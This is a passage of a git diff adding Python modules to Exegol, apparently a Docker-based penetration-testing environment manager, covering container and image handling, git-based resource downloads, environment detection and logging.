(~1G)", True): + # If git wrapper is ready and exegol resources location is the corresponding submodule, running submodule update + # if not, git clone resources + if UserConfig().exegol_resources_path == ConstantConfig.src_root_path_obj / 'exegol-resources' and \ + self.getWrapperGit().isAvailable: + # When resources are load from git submodule, git objects are stored in the root .git directory + self.__warningExcludeFolderAV(ConstantConfig.src_root_path_obj) + if self.getWrapperGit().submoduleSourceUpdate("exegol-resources"): + self.__git_resources = None + self.getResourcesGit() + else: + # Error during install, raise error to avoid update process + raise CancelOperation + else: + self.__warningExcludeFolderAV(UserConfig().exegol_resources_path) + if not self.__git_resources.clone(ConstantConfig.EXEGOL_RESOURCES_REPO): + # Error during install, raise error to avoid update process + raise CancelOperation + else: + # User cancel installation, skip update update + raise CancelOperation + + def isExegolResourcesReady(self) -> bool: + """Update Exegol-resources from git (submodule)""" + return self.getResourcesGit(fast_load=True).isAvailable + + @staticmethod + def __warningExcludeFolderAV(directory: Union[str, Path]): + """Generic procedure to warn the user that not antivirus compatible files will be downloaded and that + the destination folder should be excluded from the scans to avoid any problems""" + logger.warning(f"If you are using an [orange3][g]Anti-Virus[/g][/orange3] on your host, you should exclude the folder {directory} before starting the download.") + while not Confirm(f"Are you ready to start the download?", True): + pass diff --git a/exegol/model/SelectableInterface.py b/exegol/model/SelectableInterface.py new file mode 100644 index 00000000..c16f1526 --- /dev/null +++ b/exegol/model/SelectableInterface.py @@ -0,0 +1,10 @@ +class SelectableInterface: + """Generic class used to select objects in the user TUI""" + + def getKey(self) -> str: + """Universal unique key getter""" + raise NotImplementedError + + def __eq__(self, other): + """Generic '==' operator overriding matching object key""" + return other == self.getKey() diff --git a/exegol/model/__init__.py b/exegol/model/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/utils/ConstantConfig.py b/exegol/utils/ConstantConfig.py new file mode 100644 index 00000000..ba8f1bd6 --- /dev/null +++ b/exegol/utils/ConstantConfig.py @@ -0,0 +1,53 @@ +import site +from pathlib import Path + + +class ConstantConfig: + """Constant parameters information""" + # Exegol Version + version: str = "4.0.0" + + # OS Dir full root path of exegol project + src_root_path_obj: Path = Path(__file__).parent.parent.parent.resolve() + # Path of the Dockerfile + build_context_path_obj: Path + build_context_path: str + # Install mode, check if Exegol has been git cloned or installed using pip package + git_source_installation: bool = (src_root_path_obj / '.git').is_dir() + pip_installed: bool = src_root_path_obj.parent.name == "site-packages" + # Dockerhub Exegol images repository + DOCKER_REGISTRY: str = "hub.docker.com" # Don't handle docker login operations + IMAGE_NAME: str = "nwodtuhs/exegol" + # Docker volume names (no docker volume used at this moment) + # Resources repository + EXEGOL_RESOURCES_REPO: str = "https://github.com/ShutdownRepo/Exegol-resources.git" + + @classmethod + def findBuildContextPath(cls) -> Path: + """Find the right path to the build context from Exegol docker images. + Support source clone installation and pip package (venv / user / global context)""" + dockerbuild_folder_name = "exegol-docker-build" + local_src = cls.src_root_path_obj / dockerbuild_folder_name + if local_src.is_dir(): + # If exegol is clone from github, build context is accessible from root src + return local_src + else: + # If install from pip + if site.ENABLE_USER_SITE: + # Detect a user based python env + possible_locations = [Path(site.getuserbase())] + # Detect a global installed package + for loc in site.getsitepackages(): + possible_locations.append(Path(loc).parent.parent.parent) + # Find a good match + for test in possible_locations: + context_path = test / dockerbuild_folder_name + if context_path.is_dir(): + return context_path + # Detect a venv context + return Path(site.PREFIXES[0]) / dockerbuild_folder_name + + +# Dynamically built attribute must be set after class initialization +ConstantConfig.build_context_path_obj = ConstantConfig.findBuildContextPath() +ConstantConfig.build_context_path = str(ConstantConfig.build_context_path_obj) diff --git a/exegol/utils/DockerUtils.py b/exegol/utils/DockerUtils.py new file mode 100644 index 00000000..1e7c7077 --- /dev/null +++ b/exegol/utils/DockerUtils.py @@ -0,0 +1,452 @@ +import json +import os +from datetime import datetime +from typing import List, Optional, Union + +import docker +import requests +from docker import DockerClient +from docker.errors import APIError, DockerException, NotFound, ImageNotFound +from docker.models.images import Image +from docker.models.volumes import Volume +from requests import ReadTimeout + +from exegol.console.TUI import ExegolTUI +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.exceptions.ExegolExceptions import ObjectNotFound +from exegol.model.ExegolContainer import ExegolContainer +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, console + + +# SDK Documentation : https://docker-py.readthedocs.io/en/stable/index.html + +class DockerUtils: + """Utility class between exegol and the Docker SDK""" + try: + # Connect Docker SDK to the local docker instance. + # Docker connection setting is loaded from the user environment variables. + __client: DockerClient = docker.from_env() + # Check if the docker daemon is serving linux container + __daemon_info = __client.info() + if __daemon_info.get("OSType", "linux").lower() != "linux": + logger.critical( + f"Docker daemon is not serving linux container ! Docker OS Type is: {__daemon_info.get('OSType', 'linux')}") + EnvInfo.initData(__daemon_info) + except DockerException as err: + if 'ConnectionRefusedError' in str(err): + logger.critical("Unable to connect to docker (from env config). Is docker running on your machine? " + "Exiting.") + elif 'FileNotFoundError' in str(err): + logger.critical("Unable to connect to docker. Is docker installed on your machine? " + "Exiting.") + else: + logger.error(err) + logger.critical( + "Unable to connect to docker (from env config). Is docker operational and accessible? on your machine? " + "Exiting.") + __images: Optional[List[ExegolImage]] = None + __containers: Optional[List[ExegolContainer]] = None + + @classmethod + def clearCache(cls): + """Remove class's images and containers data cache + Only needed if the list has to be updated in the same runtime at a later moment""" + cls.__containers = None + cls.__images = None + + @classmethod + def getDockerInfo(cls) -> dict: + """Fetch info from docker daemon""" + return cls.__daemon_info + + # # # Container Section # # # + + @classmethod + def listContainers(cls) -> List[ExegolContainer]: + """List available docker containers. + Return a list of ExegolContainer""" + if cls.__containers is None: + cls.__containers = [] + try: + docker_containers = cls.__client.containers.list(all=True, filters={"name": "exegol-"}) + except APIError as err: + logger.debug(err) + logger.critical(err.explanation) + # Not reachable, critical logging will exit + return # type: ignore + for container in docker_containers: + cls.__containers.append(ExegolContainer(container)) + return cls.__containers + + @classmethod + def createContainer(cls, model: ExegolContainerTemplate, temporary: bool = False, + command: str = None) -> ExegolContainer: + """Create an Exegol container from an ExegolContainerTemplate configuration. + Return an ExegolContainer if the creation was successful.""" + logger.info("Creating new exegol container") + model.prepare() + if command is not None: + # Overwriting container starting command, shouldn't be used, prefer using config.setContainerCommand() + model.config.setContainerCommand(command) + logger.debug(model) + # Preload docker volume before container creation + for volume in model.config.getVolumes(): + if volume.get('Type', '?') == "volume": + docker_volume = cls.__loadDockerVolume(volume_path=volume['Source'], volume_name=volume['Target']) + if docker_volume is None: + logger.warning(f"Error while creating docker volume '{volume['Target']}'") + try: + container = cls.__client.containers.run(model.image.getFullName(), + command=model.config.getContainerCommand(), + detach=True, + name=model.hostname, + hostname=model.hostname, + devices=model.config.getDevices(), + environment=model.config.getEnvs(), + network_mode=model.config.getNetworkMode(), + ports=model.config.getPorts(), + privileged=model.config.getPrivileged(), + cap_add=model.config.getCapabilities(), + sysctls=model.config.getSysctls(), + shm_size=model.config.shm_size, + stdin_open=model.config.interactive, + tty=model.config.tty, + mounts=model.config.getVolumes(), + remove=temporary, + auto_remove=temporary, + working_dir=model.config.getWorkingDir()) + except APIError as err: + logger.error(err.explanation.decode('utf-8') if type(err.explanation) is bytes else err.explanation) + logger.debug(err) + logger.critical("Error while creating exegol container. Exiting.") + # Not reachable, critical logging will exit + return # type: ignore + if container is not None: + logger.success("Exegol container successfully created !") + else: + logger.critical("Unknown error while creating exegol container. Exiting.") + # Not reachable, critical logging will exit + return # type: ignore + return ExegolContainer(container, model) + + @classmethod + def getContainer(cls, tag: str) -> ExegolContainer: + """Get an ExegolContainer from tag name.""" + try: + # Fetch potential container match from DockerSDK + container = cls.__client.containers.list(all=True, filters={"name": f"exegol-{tag}"}) + except APIError as err: + logger.debug(err) + logger.critical(err.explanation) + # Not reachable, critical logging will exit + return # type: ignore + # Check if there is at least 1 result. If no container was found, raise ObjectNotFound. + if container is None or len(container) == 0: + raise ObjectNotFound + # Filter results with exact name matching + for c in container: + if c.name == f"exegol-{tag}": + # When the right container is found, select it and stop the search + return ExegolContainer(c) + # When there is some close container's name, + # docker may return some results but none of them correspond to the request. + # In this case, ObjectNotFound is raised + raise ObjectNotFound + + # # # Volumes Section # # # + + @classmethod + def __loadDockerVolume(cls, volume_path: str, volume_name: str) -> Volume: + """Load or create a docker volume for exegol containers + (must be created before the container, SDK limitation) + Return the docker volume object""" + try: + os.makedirs(volume_path, exist_ok=True) + except PermissionError: + logger.error("Unable to create the volume folder on the filesystem locally.") + logger.critical(f"Insufficient permission to create the folder: {volume_path}") + try: + # Check if volume already exist + volume = cls.__client.volumes.get(volume_name) + path = volume.attrs.get('Options', {}).get('device', '') + if path != volume_path: + try: + cls.__client.api.remove_volume(name=volume_name) + raise NotFound('Volume must be reloaded') + except APIError as e: + if e.status_code == 409: + logger.warning("The path of the volume specified by the user is not the same as in the existing docker volume. " + "The user path will be [red]ignored[/red] as long as the docker volume already exists.") + logger.verbose("The volume is already used by some container and cannot be automatically removed.") + logger.debug(e.explanation) + else: + raise NotFound('Volume must be reloaded') + except NotFound: + try: + # Creating a docker volume bind to a host path + # Docker volume are more easily shared by container + # Docker volume can load data from container image on host's folder creation + volume = cls.__client.volumes.create(volume_name, driver="local", + driver_opts={'o': 'bind', + 'device': volume_path, + 'type': 'none'}) + except APIError as err: + logger.error(f"Error while creating docker volume '{volume_name}'.") + logger.debug(err) + logger.critical(err.explanation) + return None # type: ignore + except APIError as err: + logger.critical(f"Unexpected error by Docker SDK : {err}") + return None # type: ignore + return volume + + # # # Image Section # # # + + @classmethod + def listImages(cls, include_version_tag: bool = False) -> List[ExegolImage]: + """List available docker images. + Return a list of ExegolImage""" + if cls.__images is None: + remote_images = cls.__listRemoteImages() + local_images = cls.__listLocalImages() + images = ExegolImage.mergeImages(remote_images, local_images) + cls.__images = ExegolImage.reorderImages(images) + if not include_version_tag: + return [img for img in cls.__images if not img.isVersionSpecific() or img.isInstall()] + return cls.__images + + @classmethod + def listInstalledImages(cls) -> List[ExegolImage]: + """List installed docker images. + Return a list of ExegolImage""" + images = cls.listImages() + # Selecting only installed image + return [img for img in images if img.isInstall()] + + @classmethod + def getImage(cls, tag: str) -> ExegolImage: + """Get an ExegolImage from tag name.""" + # Fetch every images available + images = cls.listImages() + # Find a match + for i in images: + if i.getName() == tag: + return i + raise ObjectNotFound + + @classmethod + def getInstalledImage(cls, tag: str) -> ExegolImage: + """Get an already installed ExegolImage from tag name.""" + try: + if cls.__images is None: + try: + docker_local_image = cls.__client.images.get(f"{ConstantConfig.IMAGE_NAME}:{tag}") + # DockerSDK image get is an exact matching, no need to add more check + return ExegolImage(docker_image=docker_local_image) + except APIError as err: + if err.status_code == 404: + raise ObjectNotFound + else: + logger.critical(f"Error on image loading: {err}") + else: + for img in cls.__images: + if img.getName() == tag: + if not img.isInstall() or not img.isUpToDate(): + # Refresh local image status in case of installation/upgrade operations + cls.__findImageMatch(img) + return img + except ObjectNotFound: + logger.critical(f"The desired image has not been found ({ConstantConfig.IMAGE_NAME}:{tag}). Exiting") + return # type: ignore + + @classmethod + def __listLocalImages(cls, tag: Optional[str] = None) -> List[Image]: + """List local docker images already installed. + Return a list of docker images objects""" + logger.debug("Fetching local image tags, digests (and other attributes)") + try: + image_name = ConstantConfig.IMAGE_NAME + ("" if tag is None else f":{tag}") + images = cls.__client.images.list(image_name, filters={"dangling": False}) + except APIError as err: + logger.debug(err) + logger.critical(err.explanation) + # Not reachable, critical logging will exit + return # type: ignore + # Filter out image non-related to the right repository + result = [] + for img in images: + # len tags = 0 handle exegol images (nightly image lost their tag after update) + if len(img.attrs.get('RepoTags', [])) == 0 or \ + ConstantConfig.IMAGE_NAME in [repo_tag.split(':')[0] for repo_tag in img.attrs.get("RepoTags", [])]: + result.append(img) + return result + + @classmethod + def __listRemoteImages(cls) -> List[ExegolImage]: + """List remote dockerhub images available. + Return a list of ExegolImage""" + logger.debug("Fetching remote image tags, digests and sizes") + remote_results = [] + url: Optional[str] = f"https://{ConstantConfig.DOCKER_REGISTRY}/v2/repositories/{ConstantConfig.IMAGE_NAME}/tags" + # Handle multi-page tags from registry + with console.status(f"Loading information", spinner_style="blue") as s: + while url is not None: + remote_images_request = None + logger.debug(f"Fetching information from: {url}") + s.update(status=f"Fetching information from [green]{url}[/green]") + try: + remote_images_request = requests.get( + url=url, + timeout=(5, 10), verify=ParametersManager().verify) + except requests.exceptions.HTTPError as e: + logger.error(f"Response error: {e.response.text}") + except requests.exceptions.ConnectionError as err: + logger.error(f"Error: {err}") + logger.error("Connection Error: you probably have no internet.") + except requests.exceptions.ReadTimeout: + logger.error( + "[green]Dockerhub[/green] request has [red]timed out[/red]. Do you have a slow internet connection, or is the remote service slow/down? Retry later.") + except requests.exceptions.RequestException as err: + logger.error(f"Unknown connection error: {err}") + if remote_images_request is None: + logger.warning("Skipping online queries.") + return [] + docker_repo_response = json.loads(remote_images_request.text) + for docker_image in docker_repo_response["results"]: + exegol_image = ExegolImage(name=docker_image.get('name', 'NONAME'), + digest=docker_image["images"][0]["digest"], + size=docker_image.get("full_size")) + remote_results.append(exegol_image) + url = docker_repo_response.get("next") # handle multiple page tags + # Remove duplication (version specific / latest release) + return remote_results + + @classmethod + def __findImageMatch(cls, remote_image: ExegolImage): + """From a Remote ExegolImage, try to find a local match (using Remote DigestID). + This method is useful if the image repository name is also lost""" + try: + docker_image = cls.__client.images.get(f"{ConstantConfig.IMAGE_NAME}@{remote_image.getRemoteId()}") + except ImageNotFound: + raise ObjectNotFound + remote_image.setDockerObject(docker_image) + + @classmethod + def downloadImage(cls, image: ExegolImage, install_mode: bool = False) -> bool: + """Download/pull an ExegolImage""" + # Switch to install mode if the selected image is not already installed + install_mode = install_mode or not image.isInstall() + logger.info(f"{'Installing' if install_mode else 'Updating'} exegol image : {image.getName()}") + name = image.updateCheck() + if name is not None: + logger.info(f"Starting download. Please wait, this might be (very) long.") + try: + ExegolTUI.downloadDockerLayer( + cls.__client.api.pull(repository=ConstantConfig.IMAGE_NAME, + tag=name, + stream=True, + decode=True)) + logger.success(f"Image successfully updated") + # Remove old image + if not install_mode and image.isInstall(): + cls.removeImage(image, upgrade_mode=not install_mode) + return True + except APIError as err: + if err.status_code == 500: + logger.error(f"Error: {err.explanation}") + logger.error(f"Error while contacting docker registry. Aborting.") + elif err.status_code == 404: + logger.critical(f"The image has not been found on the docker registry: {err.explanation}") + else: + logger.debug(f"Error: {err}") + logger.critical(f"An error occurred while downloading this image: {err.explanation}") + return False + + @classmethod + def downloadVersionTag(cls, image: ExegolImage) -> Union[ExegolImage, str]: + """Pull a docker image for a specific version tag and return the corresponding ExegolImage""" + try: + image = cls.__client.images.pull(repository=ConstantConfig.IMAGE_NAME, + tag=image.getLatestVersionName()) + return ExegolImage(docker_image=image, isUpToDate=True) + except APIError as err: + if err.status_code == 500: + return f"error while contacting docker registry: {err.explanation}" + elif err.status_code == 404: + return f"matching tag doesn't exist: {err.explanation}" + else: + logger.debug(f"Error: {err}") + return f"en unknown error occurred while downloading this image : {err.explanation}" + + @classmethod + def removeImage(cls, image: ExegolImage, upgrade_mode: bool = False) -> bool: + """Remove an ExegolImage from disk""" + logger.verbose(f"Removing {'previous ' if upgrade_mode else ''}image '{image.getName()}' ...") + tag = image.removeCheck() + if tag is None: # Skip removal if image is not installed locally. + return False + try: + if not image.isVersionSpecific() and image.getInstalledVersionName() != image.getName(): + # Docker can't remove multiple images at the same tag, version specific tag must be remove first + logger.debug(f"Remove image {image.getFullVersionName()}") + cls.__client.images.remove(image.getFullVersionName(), force=False, noprune=False) + logger.debug(f"Remove image {image.getLocalId()} ({image.getFullName()})") + with console.status(f"Removing {'previous ' if upgrade_mode else ''}image '{image.getName()}' ...", spinner_style="blue"): + cls.__client.images.remove(image.getLocalId(), force=False, noprune=False) + logger.success(f"{'Previous d' if upgrade_mode else 'D'}ocker image successfully removed.") + return True + except APIError as err: + # Handle docker API error code + logger.verbose(err.explanation) + if err.status_code == 409: + if upgrade_mode: + logger.error(f"The '{image.getName()}' image cannot be deleted yet, " + "all containers using this old image must be deleted first.") + else: + logger.error("This image cannot be deleted because it is currently used by a container. Aborting.") + elif err.status_code == 404: + logger.error("This image doesn't exist locally. Aborting.") + else: + logger.critical(f"An error occurred while removing this image : {err}") + except ReadTimeout: + logger.error("The deletion of the image has timeout, the deletion may be incomplete.") + return False + + @classmethod + def buildImage(cls, tag: str, build_profile: Optional[str] = None, build_dockerfile: Optional[str] = None): + """Build a docker image from source""" + logger.info(f"Building exegol image : {tag}") + if build_profile is None or build_dockerfile is None: + build_profile = "full" + build_dockerfile = "Dockerfile" + logger.info("Starting build. Please wait, this might be [bold](very)[/bold] long.") + logger.verbose(f"Creating build context from [gold]{ConstantConfig.build_context_path}[/gold] with " + f"[green][b]{build_profile}[/b][/green] profile.") + try: + # path is the directory full path where Dockerfile is. + # tag is the name of the final build + # dockerfile is the Dockerfile filename + ExegolTUI.buildDockerImage( + cls.__client.api.build(path=ConstantConfig.build_context_path, + dockerfile=build_dockerfile, + tag=f"{ConstantConfig.IMAGE_NAME}:{tag}", + buildargs={"TAG": f"{build_profile}", + "VERSION": "local", + "BUILD_DATE": datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')}, + rm=True, + forcerm=True, + pull=True, + decode=True)) + logger.success(f"Exegol image successfully built") + except APIError as err: + logger.debug(f"Error: {err}") + if err.status_code == 500: + logger.error(f"Error: {err.explanation}") + logger.error("Error while contacting docker hub. You probably don't have internet. Aborting.") + logger.debug(f"Error: {err}") + else: + logger.critical(f"An error occurred while building this image : {err}") diff --git a/exegol/utils/EnvInfo.py b/exegol/utils/EnvInfo.py new file mode 100644 index 00000000..3ced4329 --- /dev/null +++ b/exegol/utils/EnvInfo.py @@ -0,0 +1,78 @@ +import platform +import re +import subprocess +from typing import Optional + + +class EnvInfo: + """Contain information about the environment (host, OS, platform, etc)""" + # Shell env + current_platform: str = "WSL" if "microsoft" in platform.release() else platform.system() # Can be 'Windows', 'Linux' or 'WSL' + is_linux_shell: bool = current_platform in ["WSL", "Linux"] # TODO test mac platform + is_windows_shell: bool = current_platform == "Windows" + __windows_release: Optional[str] = None + # Host OS + __docker_host_os: Optional[str] = None + __docker_engine: Optional[str] = None + + @classmethod + def initData(cls, docker_info): + """Initialize information from Docker daemon data""" + # Fetch data from Docker daemon + docker_os = docker_info.get("OperatingSystem", "unknown").lower() + docker_kernel = docker_info.get("KernelVersion", "unknown").lower() + # Deduct a Windows Host from data + is_host_windows = docker_os == "docker desktop" and "microsoft" in docker_kernel # TODO handle mac docker-desktop + cls.__docker_host_os = "Windows" if is_host_windows else "Unix" + if is_host_windows: + # Check docker engine with Windows host + is_wsl2 = "wsl2" in docker_kernel + cls.__docker_engine = "wsl2" if is_wsl2 else "hyper-v" + else: + cls.__docker_engine = "Kernel" + pass + + @classmethod + def getHostOs(cls) -> str: + """Return Host OS + Can be 'Windows' or 'Unix'""" + # initData must be called from DockerUtils on client initialisation + assert cls.__docker_host_os is not None + return cls.__docker_host_os + + @classmethod + def getWindowsRelease(cls) -> str: + # Cache check + if cls.__windows_release is None: + if cls.is_windows_shell: + # From a Windows shell, python supply an approximate (close enough) version of windows + cls.__windows_release = platform.win32_ver()[1] + elif cls.current_platform == "WSL": + # From a WSL shell, we must create a process to retrieve the host's version + # Find version using MS-DOS command 'ver' + proc = subprocess.Popen(["cmd.exe", "/c", "ver"], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL) + proc.wait() + assert proc.stdout is not None + # Try to match Windows version + matches = re.search(r"version (\d+\.\d+\.\d+)(\.\d*)?", proc.stdout.read().decode('utf-8')) + if matches: + # Select match 1 and apply to the attribute + cls.__windows_release = matches.group(1) + else: + # If there is any match, fallback to empty + cls.__windows_release = "" + else: + cls.__windows_release = "" + return cls.__windows_release + + @classmethod + def isWindowsHost(cls) -> bool: + return cls.getHostOs() == "Windows" + + @classmethod + def getDockerEngine(cls) -> str: + """Return Docker engine type. + Can be 'Kernel', 'wsl2' or 'hyper-v'""" + # initData must be called from DockerUtils on client initialisation + assert cls.__docker_engine is not None + return cls.__docker_engine diff --git a/exegol/utils/ExeLog.py b/exegol/utils/ExeLog.py new file mode 100644 index 00000000..89d69242 --- /dev/null +++ b/exegol/utils/ExeLog.py @@ -0,0 +1,118 @@ +import logging +import os +from typing import Any, cast + +from rich.console import Console +from rich.logging import RichHandler + + +# Customized logging class +class ExeLog(logging.Logger): + """Project's Logger custom class""" + # New logging level + SUCCESS: int = 25 + VERBOSE: int = 15 + ADVANCED: int = 13 + + @staticmethod + def setVerbosity(verbose: int, quiet: bool = False): + """Set logging level accordingly to the verbose count or with quiet enable.""" + if quiet: + logger.setLevel(logging.CRITICAL) + elif verbose == 1: + logger.setLevel(ExeLog.VERBOSE) + elif verbose == 2: + logger.setLevel(ExeLog.ADVANCED) + elif verbose >= 3: + logger.setLevel(logging.DEBUG) + else: + # Default INFO + logger.setLevel(logging.INFO) + + def debug(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default debug text format with rich color support""" + super(ExeLog, self).debug("{}[D]{} {}".format("[bold yellow3]", "[/bold yellow3]", msg), *args, **kwargs) + + def advanced(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Add advanced logging method with text format / rich color support""" + if self.isEnabledFor(ExeLog.ADVANCED): + self._log(ExeLog.ADVANCED, + "{}[A]{} {}".format("[bold yellow3]", "[/bold yellow3]", msg), args, **kwargs) + + def verbose(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Add verbose logging method with text format / rich color support""" + if self.isEnabledFor(ExeLog.VERBOSE): + self._log(ExeLog.VERBOSE, + "{}[V]{} {}".format("[bold blue]", "[/bold blue]", msg), args, **kwargs) + + def raw(self, msg: Any, level=VERBOSE, markup=False, highlight=False, emoji=False, rich_parsing=False) -> None: + """Add raw text logging, used for stream printing.""" + if rich_parsing: + markup = True + highlight = True + emoji = True + if self.isEnabledFor(level): + if type(msg) is bytes: + msg = msg.decode('utf-8', errors="ignore") + # Raw message are print directly to the console bypassing logging system and auto formatting + console.print(msg, end='', markup=markup, highlight=highlight, emoji=emoji) + + def info(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default info text format with rich color support""" + super(ExeLog, self).info("{}[*]{} {}".format("[bold blue]", "[/bold blue]", msg), *args, **kwargs) + + def warning(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default warning text format with rich color support""" + super(ExeLog, self).warning("{}[!]{} {}".format("[bold orange3]", "[/bold orange3]", msg), *args, **kwargs) + + def error(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default error text format with rich color support""" + super(ExeLog, self).error("{}[-]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) + + def exception(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default exception text format with rich color support""" + super(ExeLog, self).exception("{}[x]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) + + def critical(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default critical text format with rich color support + Add auto exit.""" + super(ExeLog, self).critical("{}[!]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) + exit(1) + + def success(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Add success logging method with text format / rich color support""" + if self.isEnabledFor(ExeLog.SUCCESS): + self._log(ExeLog.SUCCESS, + "{}[+]{} {}".format("[bold green]", "[/bold green]", msg), args, **kwargs) + + def empty_line(self) -> None: + """Print an empty line.""" + self.raw(os.linesep, level=logging.INFO) + + +# Global rich console object +console: Console = Console() + +# Main logging default config +# Set default Logger class as ExeLog +logging.setLoggerClass(ExeLog) + +# Add new level to the logging config +logging.addLevelName(ExeLog.VERBOSE, "VERBOSE") +logging.addLevelName(ExeLog.SUCCESS, "SUCCESS") +logging.addLevelName(ExeLog.ADVANCED, "ADVANCED") +# Logging setup using RichHandler and minimalist text format +logging.basicConfig( + format="%(message)s", + handlers=[RichHandler(rich_tracebacks=True, + show_time=False, + markup=True, + show_level=False, + show_path=False, + console=console)] +) + +# Global logger object +logger: ExeLog = cast(ExeLog, logging.getLogger("main")) +# Default log level +logger.setLevel(logging.INFO) diff --git a/exegol/utils/FsUtils.py b/exegol/utils/FsUtils.py new file mode 100644 index 00000000..5be1a46c --- /dev/null +++ b/exegol/utils/FsUtils.py @@ -0,0 +1,50 @@ +import re +import subprocess +from pathlib import Path, PurePosixPath, PurePath +from typing import Optional + +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger + + +def parseDockerVolumePath(source: str) -> PurePath: + """Parse docker volume path to find the corresponding host path.""" + # Check if path is from Windows Docker Desktop + matches = re.match(r"^/run/desktop/mnt/host/([a-z])(/.*)$", source, re.IGNORECASE) + if matches: + # Convert Windows Docker-VM style volume path to local OS path + src_path = Path(f"{matches.group(1).upper()}:{matches.group(2)}") + logger.debug(f"Windows style detected : {src_path}") + return src_path + else: + # Remove docker mount path if exist + return PurePosixPath(source.replace('/run/desktop/mnt/host', '')) + + +def resolvPath(path: Path) -> str: + """Resolv a filesystem path depending on the environment. + On WSL, Windows PATH can be resolved using 'wslpath'.""" + if path is None: + return '' + if EnvInfo.current_platform == "WSL": + try: + # Resolv Windows path on WSL environment + p = subprocess.Popen(["wslpath", "-a", str(path)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + output, err = p.communicate() + logger.debug(f"Resolv path input: {path}") + logger.debug(f"Resolv path output: {output!r}") + if err != b'': + # result is returned to STDERR when the translation didn't properly find a match + logger.debug(f"Error on FS path resolution: {err!r}. Input path is probably a linux path.") + else: + return output.decode('utf-8').strip() + except FileNotFoundError: + logger.warning("Missing WSL tools: 'wslpath'. Skipping resolution.") + return str(path) + + +def resolvStrPath(path: Optional[str]) -> str: + """Try to resolv a filesystem path from a string.""" + if path is None: + return '' + return resolvPath(Path(path)) diff --git a/exegol/utils/GitUtils.py b/exegol/utils/GitUtils.py new file mode 100644 index 00000000..3c744064 --- /dev/null +++ b/exegol/utils/GitUtils.py @@ -0,0 +1,348 @@ +from pathlib import Path +from typing import Optional, List + +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.ExeLog import logger, console + + +# SDK Documentation : https://gitpython.readthedocs.io/en/stable/index.html + +class GitUtils: + """Utility class between exegol and the Git SDK""" + + def __init__(self, + path: Optional[Path] = None, + name: str = "wrapper", + subject: str = "source code", + skip_submodule_update: bool = False): + """Init git local repository object / SDK""" + if path is None: + path = ConstantConfig.src_root_path_obj + self.isAvailable = False + self.__is_submodule = False + self.__git_disable = False + self.__repo_path = path + self.__git_name: str = name + self.__git_subject: str = subject + abort_loading = False + # Check if .git directory exist + try: + test_git_dir = self.__repo_path / '.git' + if test_git_dir.is_file(): + logger.debug("Git submodule repository detected") + self.__is_submodule = True + elif not test_git_dir.is_dir(): + raise ReferenceError + except ReferenceError: + if self.__git_name == "wrapper": + logger.warning("Exegol has not been installed via git clone. Skipping wrapper auto-update operation.") + if ConstantConfig.pip_installed: + logger.info("If you have installed Exegol with pip, check for an update with the command " + "[green]pip3 install exegol --upgrade[/green]") + abort_loading = True + # locally import git in case git is not installed of the system + try: + from git import Repo, Remote, InvalidGitRepositoryError, FetchInfo + except ModuleNotFoundError: + self.__git_disable = True + logger.debug("Git module is not installed.") + return + except ImportError: + self.__git_disable = True + logger.error("Unable to find git tool locally. Skipping git operations.") + return + self.__gitRepo: Optional[Repo] = None + self.__gitRemote: Optional[Remote] = None + self.__fetchBranchInfo: Optional[FetchInfo] = None + + if abort_loading: + return + logger.debug(f"Loading git at {self.__repo_path}") + try: + self.__gitRepo = Repo(self.__repo_path) + logger.debug(f"Repo path: {self.__gitRepo.git_dir}") + self.__init_repo(skip_submodule_update) + except InvalidGitRepositoryError as err: + logger.verbose(err) + logger.warning("Error while loading local git repository. Skipping all git operation.") + + def __init_repo(self, skip_submodule_update: bool = False): + self.isAvailable = True + assert self.__gitRepo is not None + logger.debug("Git repository successfully loaded") + if len(self.__gitRepo.remotes) > 0: + self.__gitRemote = self.__gitRepo.remotes['origin'] + else: + logger.warning("No remote git origin found on repository") + logger.debug(self.__gitRepo.remotes) + if not skip_submodule_update: + self.__initSubmodules() + + def clone(self, repo_url: str, optimize_disk_space: bool = True) -> bool: + if self.isAvailable: + logger.warning(f"The {self.getName()} repo is already cloned.") + return False + # locally import git in case git is not installed of the system + try: + from git import Repo, Remote, InvalidGitRepositoryError, FetchInfo + except ModuleNotFoundError: + logger.debug("Git module is not installed.") + return False + except ImportError: + logger.error(f"Unable to find git on your machine. The {self.getName()} repository cannot be cloned.") + logger.warning("Please install git to support this feature.") + return False + custom_options = [] + if optimize_disk_space: + custom_options.append('--depth=1') + # TODO add progress bar via TUI + from git import GitCommandError + try: + with console.status(f"Downloading {self.getName()} git repository", spinner_style="blue"): + self.__gitRepo = Repo.clone_from(repo_url, str(self.__repo_path), multi_options=custom_options) + except GitCommandError as e: + # GitPython user \n only + error = GitUtils.formatStderr(e.stderr) + logger.error(f"Unable to clone the git repository. {error}") + return False + self.__init_repo() + return True + + def getCurrentBranch(self) -> Optional[str]: + """Get current git branch name""" + if not self.isAvailable: + return None + assert self.__gitRepo is not None + try: + return str(self.__gitRepo.active_branch) + except TypeError: + logger.debug("Git HEAD is detached, cant find the current branch.") + return None + except ValueError: + logger.error(f"Unable to find current git branch in the {self.__git_name} repository. Check the path in the .git file from {self.__repo_path / '.git'}") + return None + + def listBranch(self) -> List[str]: + """Return a list of str of all remote git branch available""" + assert self.isAvailable + result: List[str] = [] + if self.__gitRemote is None: + return result + for branch in self.__gitRemote.fetch(): + branch_parts = 